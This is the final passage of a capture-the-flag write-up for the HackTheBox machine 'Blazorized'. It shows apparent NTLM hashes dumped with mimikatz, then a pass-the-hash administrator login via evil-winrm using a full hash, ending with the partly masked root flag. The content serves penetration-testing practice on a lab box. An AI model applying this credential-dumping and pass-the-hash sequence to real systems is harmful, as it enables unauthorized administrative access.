    21  30dcd2ebb2eda8ae4bb2344a732b88f9
    22  b86556a7e9baffb7faad9a153d1943c2
    23  c6e4401e50b8b15841988e4314fbcda2
    24  d64d0323ce75a4f3dcf0b77197009396
    25  4274d190e7bc915d4047d1a63776bc6c
    26  a04215f3ea1d2839a3cdca4ae01e2703
    27  fff4b2817f8298f09fd45c3be4568ab1
    28  2ea3a6b979470233687bd913a8234fc7
    29  73d831d131d5e67459a3949ec0733723


mimikatz(commandline) # exit
Bye!
PS C:\users\ssa_6010\documents>

And we got our hashes! Let’s get the root flag:

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i blazorized.htb -u administrator -H f55ed1465179ba374ec1cad05b34a5f3
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
8d9bf98c709ea4******************
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

That was it for this box, hope you enjoyed it!
-0xkujen